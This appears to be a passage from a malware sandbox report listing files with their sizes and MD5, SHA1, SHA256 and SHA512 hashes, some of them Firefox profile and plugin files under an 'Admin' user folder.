SHA512c1119cfa02a7cf9c74654064dc0bac6830efbf71820eaf21714fedec17afc532ad865c936dd68e7f69d477c5809960ec5fb280420f0dfd1e36aff7635f81fc2e
-
Filesize
1.8MB
MD58c46fe8eee484e73651be335c8ee5e84
SHA19d9b074b985584f45cb6c7a620970dc6a599fb72
SHA2568863fb5e08bc5fe36263d7e0c34f14aa6102526a891a972ee2dc0ac5f6708619
SHA512e2ccec1c15c1d380000afacb0d0755aa25fb2964bfc62d0317f66271dd10964f4f3a02158878da794b99d18c2649b83a0b38387114962becd776234f39e289d3
-
Filesize
37KB
MD53b0b2b1cc0756f71ea52fc4e53c1b6f1
SHA1b43b68ed8a7628152cfd1a741cdf76a77592f0a7
SHA2565e6da65939db0383d8ee0483186a43f0dc2a878be426a0f4b1cd30e3b10fc67d
SHA5123eb7e6857dc44c87adbcc976fed74fe82ce07e1e647c50700f6d97c037942755cc31ef1fb9ee12f379c6f4619214c900e51736ff6f245b4ee39eed50504ab8d4
-
Filesize
80KB
MD574a72eedf34baf3ab6c6339fe77eab79
SHA173865bc161df56e20582f05f804e0a531f7ccb9f
SHA25608dc77c3985e2bbea8dbe9c67d45a619ca071000de91576f1d87541220593838
SHA512669e838263e056cab6e3e70e6abd814fb20196e6331c2dcbf5fcda04f82b49c032943ae005aa39b3f8baf51db4071643197db36e16482967c93ac81d494ad6ed
-
Filesize
58KB
MD5f7317b5aebfad11fe98206f4848b9cd9
SHA1ac27eb76fcb8a4ce9e40350113c7b00b880dfbec
SHA256e86ec279bd864f26e5de96adb095b6a6eac223c7c7e0334e4fd1ff7d5ed9a3ad
SHA5125eb3731c074f7fd75a5cf018879a242a552cb82cf27f1c45e0d6e05749720de9abd2de8bbf96b3ffbbb8812f3d25111760df8b7836aa420424c55bcfef3e9a33
-
Filesize
143KB
MD5106fdb323c48de2f4d541001a6c71b23
SHA15d2df1a8f8e71a12ae1a367c2c6f43720449efc0
SHA2569bbb2643cbc5e9dda6511bcc9f7293c0a03ed741cfdb699fdf503cb3282ee704
SHA51200e0b299800f66e7d624479784324bf4854674c92708d2de5890b430a7d961102d5f5720f55fd426782ffa5ddd6617e01f6d13383dd490c1eac62895253dcb89
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
18KB
MD52fe473cb6184e1a5bb0fcde9228e7b6d
SHA15043cffbbea46ce7dcd6c12f6ebca5154919b5c6
SHA256371b62ac2c1cf601ae6c45d88f31947625ef7593b136cae43f936a43b18548f9
SHA512492619923441b9623b01985c7cd6da824baba065d0c7e92b5f38681db33f7aca071bd03cb0ffa9d189a99d956e715b1a92c1d89bda1267bbd9eca1f1255c8e5e
-
Filesize
1.9MB
MD55b1dbccb1977e33fae7e0efa78e96b49
SHA1fd97d5e5080b0130e21f998ed33b47997dd87d84
SHA256c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77
SHA51262de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8
-
Filesize
262KB
MD536105cc7aff011ef834f9e83717f9ab1
SHA19b5a1a9da2f1e22ae23517c45b82c734a5793ded
SHA25636263b9d2418efa92ba637974cfed268437354d88be78814354c5d47337890c2
SHA51238662724ed70d768ff19ed260f17593a956858ee5aedd4d4178f895bf3ca39181983d8310acc6aa203223518fa7394e64829832b380121a86360120aab66ba50
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
114KB
MD5af4d3825d4098bd9c66faf64e20acdc8
SHA1e205b61bd6e5f4d44bc36339fe3c207e52ee2f01
SHA256095484268f554458404ca64d5c9f7b99abe0dbb1a75e056184047dc836f2e484
SHA51271b4b99614e28a85925033f95d90e7c43f958b2284f7d7605d2ea896330efa9bba8b6d9550f62829daec3cf452e95c964ddb30cd9c7850bfa41a988792132e78
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\AlternateServices.bin
Filesize7KB
MD580f36b646f916825724ae05cd35fad99
SHA18e61e1d1d7834c3008207d7ce9b78f73bb188603
SHA25635fecaf0fdbae526f1decc9c4c59a4a7220eda5a3122529446cba06fcfdcc5c9
SHA512b37d0c0bf968c50101c429af8ea871d192c39722148b84c106335ab0c05ab7e740bf826a112d04519d4cd056c7993fd23d6f675b33567933ec85581af422d78b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\AlternateServices.bin
Filesize13KB
MD5c30af38ec67a99739b2ccf8ce9e57218
SHA10c3b687c9b9a22ddc40782830ff956f2e66f4e38
SHA25691e478c1cc0dc34051c399ebf067d81275da066299fb8d94bad2d406c517cf21
SHA512ea43ae05eef05b891308e6ac8039a6f0173f880a85b9cc0c355782f78dd4ec304944e3e64704e0d9ffd1a68a93d0580b0243b2b555e2c41674d33fb31274d3d4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\AlternateServices.bin
Filesize18KB
MD59dc66b6d0c1d94118742035fd85811ec
SHA19e2d65c32eb33ed8cefb5048530e693e6e44df2e
SHA25618960b3484f7858a655bb98203fe09e1fa219747fd3d2e8be74ca9ac3658b3d1
SHA5126c8d873a5c2ae26b3d0dff3488439f6e099c9b742f1f75e6d08b8b627aed636bdbe8639e200eeea2b4f042fb219648247a3400d0b385b6741a639225f41d6bc6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD5c87c29902ef5e943d07179c976a1b61a
SHA1a3273e20b0722d97dd09dbf119c1f03a95db8a57
SHA25691b8e74535d38548e24f83c1d13db2231135b808e8114a989a4fbcb3cccb3f89
SHA512173f3e799d43343b41be930df7f1ab53e3d820963e1ef8c91c500d9980215f2363840aa09d72f4ed490bba8b1451320084c605dd511bc869a7ab23e298187295
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5bd3846f09b9cd6302984db60bb153865
SHA16e655c0debb1b7a8da2c7d08194b98aca9d8b1f1
SHA256c26f0ae338ef2cd21ade5fe138d938f8ddd0750ecec039b420c9601b13dee36a
SHA5122eb762dcd6b733425adeee6a84ea096266a1b36309b141e4ccf4e5a0c1893d3ce2242cc911a5ac29a9f6525d68846e827a8ae4936fbc09013d5badeccb7f55f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD50bc81aba81d5290e52f4d1db1daa69c3
SHA1e0bf3de51a455add85739ee4647eb2a8903747a2
SHA256aa6f88dc1fd872a7108c9afe08987460821b17adfe0a77a09d84bca58acef40a
SHA512a6f2df5f9064298c072e6790954e2e289150baf5d26fe9fd1c1b2edcb9a93c86f153b91eec42571892a8cee8d853d227d73e98fac26aec751e235ef5e44756cc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD5dc147374b971373da22c8ce318f086b0
SHA1410f9f6976fb339bb8ed96c575073f8aa7e76221
SHA256f187677e1618a678debb5cb7d0b25fbd9820374e16690cb3edbd4bfc6aabcf6b
SHA512db5fa5a3a9f6b7068c6fe3c7b890ce80345890974a2c1e826a376946d9c56663f72ee9d8556aebc6b63fcb5bef44129be3de19813f5b786d01a60430db24ad83
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\pending_pings\2a9b76a6-0436-4207-ab1f-8b10d19a3a5f
Filesize982B
MD5d8b980f2b688594649eac2ed582ca20b
SHA1b265d94a4d4d589a2e58c879b13b3f9730ac73b4
SHA2565764f9760fe987c9bf24cee55629ec409ab0e965ea9cabe465df613bc5fa7f20
SHA512a227fa6fad50bc46185277a62ac02951c01bd35ab488969adbc1732aa128b8114f2a7151d30f9b08a3aabb7097514bcaee8bb44dd8b195dc616c8e0ef45051a2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\datareporting\glean\pending_pings\38431782-9abf-41b5-9241-56a4f1523a01
Filesize659B
MD502c352ac021df30cb34282d0250dd259
SHA1ce6306cb0aa14a73c699fba6c29709bdd4e3df28
SHA256005553b7e0b19bde33e4f67f601bac4f7d3d5307ee7992df0000d7d88e9d4fe9
SHA512806ac5837ba2e64e2698082d603ec455beb2fcbb9fbc6be89e66e14e1ddf5f267da0f1f252f46ded5a3a60bf8eba53c32de9c1e79076095299add532e0d56dc7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8wi25oev.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
9KB
MD5512eba2756d4bde24b284afe5d483ac3
SHA1cb85d0ae42c1082bfffe68942a3b53704ef2b55b
SHA256776275f66aad69e12eb0d271e4044bef2e89c4d4ffe01a4ba0215976a2e998e8
SHA51213c2eb8e83b4b452906581982d8c3883555a63d2ae5281554fb7fa6b3495f1a583270fcf344ca4376688d3bafd7fe5dace6a94c714ca97e831e2fde1f4ac98bd
-
Filesize
11KB
MD58f7fc644c1ec1cc25320e1920d1c93e4
SHA133526366fd1bb3e6276a0964d063e840884d5d30
SHA2565f7406ea947e6156185470016016998fd3acc6950e732d9904d06db2e9f976ed
SHA512610609a4511873ca70e37e03dd36addb3aea71bc54e7dae68ebe62f6c65c24e40a0f29b0cdb8f27e17a01617e8e8b10e11c7d69a27731d2593d181e9a646a46c
-
Filesize
15KB
MD5998881b6dc42bd2fc85563eb88c355ce
SHA17649f91620a64b7826cf07a45a8aa72dd762a32e
SHA256259d14b41abb6af8361f455eaf4c7ef82e2423a33e772cd98ef0df916b8e4973
SHA5127a68cc7ecec39c311e8e7dccfa09c1d2093eec2554131f9cd453bd92514de69363fd39b40f91274a3f3af2aa50651922e90345eb6dba65db7b59a92fd47003a0
-
Filesize
9KB
MD5731baf03ffdc451dd8c51e4b4ad41803
SHA11db93ff604de4c57f8484892867fdc58637d8b0c
SHA2564ce928924eae6c9f543dd1d6dfe45cbfb6014f5424c0848969b0ef9833d90dc0
SHA512022953b237d090613d1b07b383eca475c75ab28569461d29bbcb36023e20ffd8bc0858d734574583dbc41551c20bea15f21917aa91a7daf385848ff8118480fe
-
Filesize
10KB
MD5f396bd2dba9a4c77bdc9a16217f6b3ef
SHA1c5ba0380c0d916cbebaa43d3d841ad976a03eb0c
SHA256e58921f29903fed90cf20961d1ac9db85b4a03787f2cb70333d6109193537974
SHA51299e339ed77c3a2bd619b1504c4f445d6cf8f14ceb512818d1bff1e180a2eb032848ac63fcfe772739aeae59de1b6a92efc878dc83b769ad960ddcaff2ed19dd0
-
Filesize
35B
MD54586c3797f538d41b7b2e30e8afebbc9
SHA13419ebac878fa53a9f0ff1617045ddaafb43dce0
SHA2567afb3a2dc57cb16223dddc970e0b464311e5311484c793abf9327a19ef629018
SHA512f2c722ae80d2c0dcdb30a6993864eb90b85be5311261012d4585c6595579582d1b37323613f5417d189adcd096fa948e0378c1e6c59761bf94d65c0a5c2f2fd3
-
Filesize
33B
MD516989bab922811e28b64ac30449a5d05
SHA151ab20e8c19ee570bf6c496ec7346b7cf17bd04a
SHA25686e0516b888276a492b19f9a84f5a866ed36925fae1510b3a94a0b6213e69192
SHA51286571f127a6755a7339a9ed06e458c8dc5898e528de89e369a13c183711831af0646474986bae6573bc5155058d5f38348d6bfdeb3fd9318e98e0bf7916e6608
-
Filesize
360KB
MD5645a45d81803813ec953409b49468e69
SHA10bc8a903ac1e5e2c84baa37edbc9a8b08227b35b
SHA2562678ff9e7de004631e19523d40153b6c04c7a88732ca15e283b0f970adcb18ef
SHA5121e85dc511cb6d8b3dba96821f2ab0dfb1bbc0c09d935516746ffb1ed6cae6c791438dd98a28f3d0ca102af96a594e1b5a9b2c729d0c6923271012d15dda21145
-
Filesize
4KB
MD5d3c47457a78daf4e14c5a08849683c14
SHA16bcb093b6ab6ecd031f92c973ed5c44fbe1ffd4e
SHA256ade51d05de1b91c8d65d41d1bc7c2c4ca110e0e14963c94d65dc01626cc49a74
SHA51275a3baed6b0216a9eb3147fd7a9c1789bc5c047023b55647ca6675edcae937bd45c06448820dc757314f268f7b2ff2596f6022b161577960d3b0734b3731c21d
-
Filesize
4KB
MD5c2cc8eca4c44e2b3ef0d7f2b30419ac9
SHA164dc68e7c989a5a78da05abdeeef09c27440732f
SHA2567a8aad34cba06adcfc1293a6f25591bfc0bb5c059ffb2b2be25f1b868d5bd325
SHA51293c5bf12e3848d664d26b4edb8a173b4d8eb2517082cd70d5cc9e3e41ab7fab88e0b41f5f33d919eecf2adbe79a2664b4bf525250ac13e4462f6d38f6819476e